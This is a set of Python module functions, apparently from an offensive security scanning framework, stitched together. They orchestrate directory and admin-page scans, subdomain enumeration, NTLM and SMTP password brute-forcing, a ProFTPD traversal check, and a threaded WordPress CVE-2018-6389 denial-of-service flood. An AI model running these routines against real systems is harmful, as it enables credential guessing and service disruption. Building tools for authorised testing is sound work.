def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type( target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = [ "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5", "Googlebot/2.1 ( http://www.googlebot.com/bot.html)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04" " Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13", "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)", "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51", "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620", "Debian APT-HTTP/1.3 (0.8.10.3)", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Googlebot/2.1 (+http://www.googlebot.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; " "http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)", "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)", "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" ] http_methods = ["GET", "HEAD"] user_agent = {'User-agent': random.choice(user_agent_list)} # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement] extra_requirements = new_extra_requirements if extra_requirements["pma_scan_http_method"][0] not in http_methods: warn(messages(language, "dir_scan_get")) extra_requirements["pma_scan_http_method"] = ["GET"] random_agent_flag = True if extra_requirements["pma_scan_random_agent"][0] == "False": random_agent_flag = False threads = [] total_req = len(extra_requirements["pma_scan_list"]) thread_tmp_filename = '{}/tmp/thread_tmp_'.format( load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) != "HTTP": target = 'http://' + target if test(target, retries, timeout_sec, user_agent, extra_requirements["pma_scan_http_method"][0], socks_proxy, verbose_level, trying, total_req, total, num, language) is 0: keyboard_interrupt_flag = False for idir in extra_requirements["pma_scan_list"]: if random_agent_flag: user_agent = {'User-agent': random.choice(user_agent_list)} t = threading.Thread( target=check, args=(target + '/' + idir, user_agent, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries, extra_requirements["pma_scan_http_method"][0], socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info( messages(language, "trying_message").format( trying, total_req, num, total, target_to_host(target), "default_port", 'pma_scan')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break else: warn(messages(language, "open_error").format(target)) # wait for threads kill_switch = 0 kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() is 1 or kill_switch is kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write is 1: info( messages(language, "directory_file_404").format(target, "default_port")) if verbose_level is not 0: __log_into_file( log_in_file, 'a', json.dumps( { 'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'pma_scan', 'DESCRIPTION': messages(language, "phpmyadmin_dir_404"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd }) + '\n', language) os.remove(thread_tmp_filename) else: warn( messages(language, "input_target_error").format('pma_scan', target))
def start( target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd, ): # Main function if ( target_type(target) != "SINGLE_IPv4" or target_type(target) != "DOMAIN" or target_type(target) != "HTTP" or target_type(target) != "SINGLE_IPv6" ): # rand useragent user_agent_list = useragents.useragents() http_methods = ["GET", "HEAD"] user_agent = {"User-agent": random.choice(user_agent_list)} # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement ] extra_requirements = new_extra_requirements if extra_requirements["admin_scan_http_method"][0] not in http_methods: warn(messages(language, "admin_scan_get")) extra_requirements["admin_scan_http_method"] = ["GET"] random_agent_flag = True if extra_requirements["admin_scan_random_agent"][0] == "False": random_agent_flag = False threads = [] total_req = len(extra_requirements["admin_scan_list"]) thread_tmp_filename = "{}/tmp/thread_tmp_".format( load_file_path() ) + "".join( random.choice(string.ascii_letters + string.digits) for _ in range(20) ) __log_into_file(thread_tmp_filename, "w", "1", language) trying = 0 if target_type(target) != "HTTP": target = 'http://' + target if test(str(target), retries, timeout_sec, user_agent, extra_requirements["admin_scan_http_method"][0], socks_proxy, verbose_level, trying, total_req, total, num, language) == 0: keyboard_interrupt_flag = False for idir in extra_requirements["admin_scan_list"]: # time.sleep(0.001) if random_agent_flag: user_agent = {'User-agent': random.choice(user_agent_list)} if target.endswith("/"): target = target[:-1] if idir.startswith("/"): idir = idir[1:] t = threading.Thread(target=check, args=( target + "/" + idir, user_agent, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries, extra_requirements[ "admin_scan_http_method"][0], socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info( messages(language, "trying_message").format( trying, total_req, num, total, target_to_host(target), "default_port", "admin_scan", ) ) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break else: warn(messages(language, "open_error").format(target)) # wait for threads kill_switch = 0 kill_time = ( int(timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1 ) while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 1 or kill_switch == kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write == 1: if verbose_level != 0: data = {'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'admin_scan', 'DESCRIPTION': messages(language, "directory_file_404").format(target, "default_port"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd} info(messages(language, "directory_file_404").format( target, "default_port"), log_in_file, "a", data, language, thread_tmp_filename) __log_into_file(log_in_file, 'a', json.dumps(data), language) os.remove(thread_tmp_filename) else: warn( messages(language, "input_target_error").format( "admin_scan", target ) )
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP': # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[ extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements if ports is None: ports = extra_requirements["Proftpd_vuln_ports"] if target_type(target) == 'HTTP': target = target_to_host(target) threads = [] total_req = len(ports) thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 keyboard_interrupt_flag = False for port in ports: port = int(port) t = threading.Thread(target=__directory_traversal, args=(target, int(port), timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info( messages(language, "trying_message").format(trying, total_req, num, total, target, port, 'Proftpd_directory_traversal_vuln')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break # wait for threads kill_switch = 0 kill_time = int( timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() is 1 or kill_switch is kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write is 1 and verbose_level is not 0: info(messages(language, "no_vulnerability_found").format('ProFTPd_directory_traversal CVE-2010-3867')) data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'Proftpd_directory_traversal_vuln', 'DESCRIPTION': messages(language, "no_vulnerability_found").format('ProFTPd_directory_traversal CVE-2010-3867'), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) else: warn(messages(language, "input_target_error").format( 'Proftpd_directory_traversal_vuln', target))
def __get_subs( target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, num, total, extra_requirements=extra_requirements_dict(), headers={ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' '(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.9', 'Accept-Encoding': 'gzip, deflate, br', }): total_req = 0 trying = 0 threads = [] thread_tmp_filename = '{}/tmp/thread_tmp_'.format( load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) for key in extra_requirements: if extra_requirements[key][0] == 'True': total_req += 1 if extra_requirements['subdomain_scan_use_netcraft'][0] == 'True': trying += 1 if verbose_level > 3: info( messages(language, "trying_process").format( trying, total_req, num, total, target, '(subdomain_scan - netcraft)')) t = threading.Thread(target=__netcraft, args=(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, headers, thread_tmp_filename)) threads.append(t) t.start() threads.append(t) if extra_requirements['subdomain_scan_use_ptrarchive'][0] == 'True': trying += 1 if verbose_level > 3: info( messages(language, "trying_process").format( trying, total_req, num, total, target, 'subdomain_scan - ptrarchive')) t = threading.Thread(target=__ptrarchive, args=(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, headers, thread_tmp_filename)) threads.append(t) t.start() threads.append(t) if extra_requirements['subdomain_scan_use_threatcrowd'][0] == 'True': trying += 1 if verbose_level > 3: info( messages(language, "trying_process").format( trying, total_req, num, total, target, 'subdomain_scan - threatcrowd')) t = threading.Thread(target=__threatcrowd, args=(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, headers, thread_tmp_filename)) threads.append(t) t.start() threads.append(t) if extra_requirements['subdomain_scan_use_virustotal'][0] == 'True': trying += 1 if verbose_level > 3: info( messages(language, "trying_process").format( trying, total_req, num, total, target, 'subdomain_scan - virustotal')) t = threading.Thread(target=__virustotal, args=(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, headers, thread_tmp_filename)) threads.append(t) t.start() threads.append(t) if extra_requirements['subdomain_scan_use_comodo_crt'][0] == 'True': trying += 1 if verbose_level > 3: info( messages(language, "trying_process").format( trying, total_req, num, total, target, 'subdomain_scan - comodo crt')) t = threading.Thread(target=__comodo_crt, args=(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, headers, thread_tmp_filename)) threads.append(t) t.start() threads.append(t) if extra_requirements['subdomain_scan_use_dnsdumpster'][0] == 'True': trying += 1 if verbose_level > 3: info( messages(language, "trying_process").format( trying, total_req, num, total, target, 'subdomain_scan - dnsdumpster')) t = threading.Thread(target=__dnsdumpster, args=(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, headers, thread_tmp_filename)) threads.append(t) t.start() threads.append(t) if extra_requirements['subdomain_scan_use_google_dig'][0] == 'True': trying += 1 if verbose_level > 3: info( messages(language, "trying_process").format( trying, total_req, num, total, target, '(subdomain_scan - google dig)')) t = threading.Thread(target=__google_dig, args=(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, headers, thread_tmp_filename)) threads.append(t) t.start() threads.append(t) if extra_requirements['subdomain_scan_use_cert_spotter'][0] == 'True': trying += 1 if verbose_level > 3: info( messages(language, "trying_process").format( trying, total_req, num, total, target, '(subdomain_scan - cert spotter)')) t = threading.Thread(target=__cert_spotter, args=(target, timeout_sec, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, headers, thread_tmp_filename)) threads.append(t) t.start() threads.append(t) # wait for threads kill_switch = 0 try: kill_time = -1 if extra_requirements["subdomain_scan_time_limit_seconds"][0] == -1 \ else int(int(extra_requirements["subdomain_scan_time_limit_seconds"[0]]) / 0.1) except: kill_time = -1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() is 1 or (kill_time is not -1 and kill_switch is kill_time): break except KeyboardInterrupt: break try: subs = list(set(open(thread_tmp_filename).read().rsplit())) os.remove(thread_tmp_filename) except: subs = [] return subs
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP': new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[ extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements if users is None: users = extra_requirements["http_ntlm_brute_users"] if passwds is None: passwds = extra_requirements["http_ntlm_brute_passwds"] if ports is None: ports = extra_requirements["http_ntlm_brute_ports"] if target.lower().startswith('http://') or target.lower().startswith('https://'): pass else: target = 'http://' + str(target) threads = [] total_req = len(users) * len(passwds) thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) curl_tmp_filename = '{}/tmp/ports_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) __log_into_file(curl_tmp_filename, 'w', '', language) trying = 0 keyboard_interrupt_flag = False for port in ports: if check_auth(target, timeout_sec, language, port): continue for user in users: for passwd in passwds: t = threading.Thread(target=login, args=( user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename, curl_tmp_filename, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info(messages(language, "trying_message").format(trying, total_req, num, total, target, port, 'http_ntlm_brute')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break if keyboard_interrupt_flag: break if keyboard_interrupt_flag: break # wait for threads kill_switch = 0 kill_time = int( timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() is 1 or kill_switch is kill_time: break except KeyboardInterrupt: break thread_write = int( open(thread_tmp_filename).read().rsplit()[0]) if thread_write is 1 and verbose_level is not 0: data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'http_ntlm_brute', 'DESCRIPTION': messages(language, "no_user_passwords"), 'TIME': now(), 'CATEGORY': "brute", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n" __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) os.remove(curl_tmp_filename) else: warn(messages(language, "input_target_error").format( 'http_ntlm_brute', target))
def __go_for_attacks(targets, check_ranges, check_subdomains, log_in_file, time_sleep, language, verbose_level, retries, socks_proxy, users, passwds, timeout_sec, thread_number, ports, ping_flag, methods_args, backup_ports, scan_method, thread_number_host, graph_flag, profile, api_flag): """ preparing for attacks and managing multi-processing for host Args: targets: list of calculated targets check_ranges: check IP range flag check_subdomains: check subdomain flag log_in_file: output filename time_sleep: time sleep seconds language: language verbose_level: verbose level number retries: retries number socks_proxy: socks proxy address users: usernames passwds: passwords timeout_sec: timeout seconds thread_number: thread numbers ports: port numbers ping_flag: ping before scan flag methods_args: method args for modules backup_ports: port numbers (backup) scan_method: selected module names thread_number_host: threads for hosts scan graph_flag: graph name profile: profile name api_flag: API flag Returns: True when it ends """ suff = now(model="%Y_%m_%d_%H_%M_%S") + "".join( random.choice(string.ascii_lowercase) for x in range(10)) subs_temp = "{}/tmp/subs_temp_".format(load_file_path()) + suff range_temp = "{}/tmp/ranges_".format(load_file_path()) + suff total_targets = -1 for total_targets, _ in enumerate( analysis(targets, check_ranges, check_subdomains, subs_temp, range_temp, log_in_file, time_sleep, language, verbose_level, retries, socks_proxy, True)): pass total_targets += 1 total_targets = total_targets * len(scan_method) try: os.remove(range_temp) except: pass range_temp = "{}/tmp/ranges_".format(load_file_path()) + suff targets = analysis(targets, check_ranges, check_subdomains, subs_temp, range_temp, log_in_file, time_sleep, language, verbose_level, retries, socks_proxy, False) trying = 0 scan_id = "".join(random.choice("0123456789abcdef") for x in range(32)) scan_cmd = messages(language, 158) if api_flag else " ".join(sys.argv) for target in targets: for sm in scan_method: trying += 1 p = multiprocessing.Process( target=start_attack, args=(str(target).rsplit()[0], trying, total_targets, sm, users, passwds, timeout_sec, thread_number, ports, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, ping_flag, methods_args, scan_id, scan_cmd)) p.name = str(target) + "->" + sm p.start() while 1: n = 0 processes = multiprocessing.active_children() for process in processes: if process.is_alive(): n += 1 else: processes.remove(process) if n >= thread_number_host: time.sleep(0.01) else: break _waiting_for = 0 while 1: try: exitflag = True if len(multiprocessing.active_children()) is not 0: exitflag = False _waiting_for += 1 if _waiting_for > 3000: _waiting_for = 0 info( messages(language, 138).format(", ".join( [p.name for p in multiprocessing.active_children()]))) time.sleep(0.01) if exitflag: break except KeyboardInterrupt: for process in multiprocessing.active_children(): process.terminate() break info(messages(language, 42)) os.remove(subs_temp) os.remove(range_temp) info(messages(language, 43)) sort_logs(log_in_file, language, graph_flag, scan_id, scan_cmd, verbose_level, 0, profile, scan_method, backup_ports) write("\n") info(messages(language, 44)) write("\n\n") finish() return True
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = [ "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5", "Googlebot/2.1 ( http://www.googlebot.com/bot.html)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04" " Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13", "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)", "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51", "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620", "Debian APT-HTTP/1.3 (0.8.10.3)", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Googlebot/2.1 (+http://www.googlebot.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; " "http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)", "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)", "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" ] user_agent = {'User-agent': random.choice(user_agent_list)} limit = 1000 # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements random_agent_flag = True if extra_requirements["wordpress_dos_cve_2018_6389_vuln_random_agent"][0] != "True": random_agent_flag = False if extra_requirements["wordpress_dos_cve_2018_6389_vuln_no_limit"][0] != "False": limit = -1 threads = [] total_req = limit filepath = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) == 'SINGLE_IPv4' or target_type(target) == 'DOMAIN': url = 'http://{0}/'.format(target) else: if target.count(':') > 1: __die_failure(messages(language, 105)) http = target.rsplit('://')[0] host = target_to_host(target) path = "/".join(target.replace('http://', '').replace('https://', '').rsplit('/')[1:]) url = http + '://' + host + '/' + path if test(url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num, language, False, log_in_file, scan_id, scan_cmd, thread_tmp_filename) is not 0: warn(messages(language, 109).format(url)) return info(messages(language, 177).format(target)) n = 0 t = threading.Thread(target=test, args=( url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num, language, True, log_in_file, scan_id, scan_cmd, thread_tmp_filename)) t.start() keyboard_interrupt_flag = False while (n != limit): n += 1 if random_agent_flag: user_agent = {'User-agent': random.choice(user_agent_list)} t = threading.Thread(target=send_dos, args=(url, user_agent, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info(messages(language, 72).format(trying, total_req, num, total, target_to_host(target), port, 'wordpress_dos_cve_2018_6389_vuln')) try: if int(open(thread_tmp_filename).read().rsplit()[0]) is 0: if limit is not -1: break except: pass while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break # wait for threads kill_switch = 0 kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() is 2 or kill_switch is kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write is 1: info(messages(language, 141).format("wordpress_dos_cve_2018_6389_vuln")) if verbose_level is not 0: data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wordpress_dos_cve_2018_6389_vuln', 'DESCRIPTION': messages(language, 141).format("wordpress_dos_cve_2018_6389_vuln"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) else: warn(messages(language, 69).format('wordpress_dos_cve_2018_6389_vuln', target))
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type( target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': threads = [] thread_tmp_filename = '{}/tmp/thread_tmp_'.format( load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 total_req = 8000 if target_type(target) != "HTTP": target = 'http://' + target t = threading.Thread(target=analyze, args=(target, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info( messages(language, "trying_message").format(trying, total_req, num, total, target_to_host(target), "", 'dir_scan')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: break # wait for threads kill_switch = 0 kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 1 or kill_switch == kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write == 1: info( messages(language, "nothing_found").format(target, "wappalyzer_scan")) if verbose_level != 0: data = json.dumps({ 'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wappalyzer_scan', 'DESCRIPTION': messages(language, "not_found"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd }) __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) else: warn( messages(language, "input_target_error").format('wappalyzer_scan', target))
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(target) != 'HTTP': # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[ extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements if users is None: users = extra_requirements["smtp_brute_users"] if passwds is None: passwds = extra_requirements["smtp_brute_passwds"] if ports is None: ports = extra_requirements["smtp_brute_ports"] if extra_requirements["smtp_brute_split_user_set_pass"][0] not in ["False", "True"]: extra_requirements["smtp_brute_split_user_set_pass"][0] = "False" if target_type(target) == 'HTTP': target = target_to_host(target) threads = [] total_req = int( len(users) * len(passwds) * len(ports) * len(extra_requirements["smtp_brute_split_user_set_pass_prefix"])) \ if extra_requirements["smtp_brute_split_user_set_pass"][0] == "False" \ else int(len(users) * len(ports) * len(extra_requirements["smtp_brute_split_user_set_pass_prefix"])) thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) ports_tmp_filename = '{}/tmp/ports_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) __log_into_file(ports_tmp_filename, 'w', '', language) ports = test_ports(ports, timeout_sec, target, retries, language, num, total, time_sleep, ports_tmp_filename, thread_number, total_req, verbose_level, socks_proxy) trying = 0 if extra_requirements["smtp_brute_split_user_set_pass"][0] == "False": for port in ports: for user in users: for passwd in passwds: t = threading.Thread(target=login, args=( user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info(messages(language, "trying_message").format(trying, total_req, num, total, target, port, 'smtp_brute')) while 1: n = 0 for thread in threads: if thread.isAlive(): n += 1 else: threads.remove(thread) if n >= thread_number: time.sleep(0.01) else: break else: keyboard_interrupt_flag = False for port in ports: for user in users: for prefix in extra_requirements["smtp_brute_split_user_set_pass_prefix"]: t = threading.Thread(target=login, args=(user, user.rsplit('@')[0] + prefix, target, port, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info(messages(language, "trying_message").format(trying, total_req, num, total, target, port, 'smtp_brute')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break else: break else: break # wait for threads kill_switch = 0 kill_time = int( timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 1 or kill_switch == kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write == 1 and verbose_level != 0: data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'smtp_brute', 'DESCRIPTION': messages(language, "no_user_passwords"), 'TIME': now(), 'CATEGORY': "brute", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n" __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) else: warn(messages(language, "input_target_error").format(target))
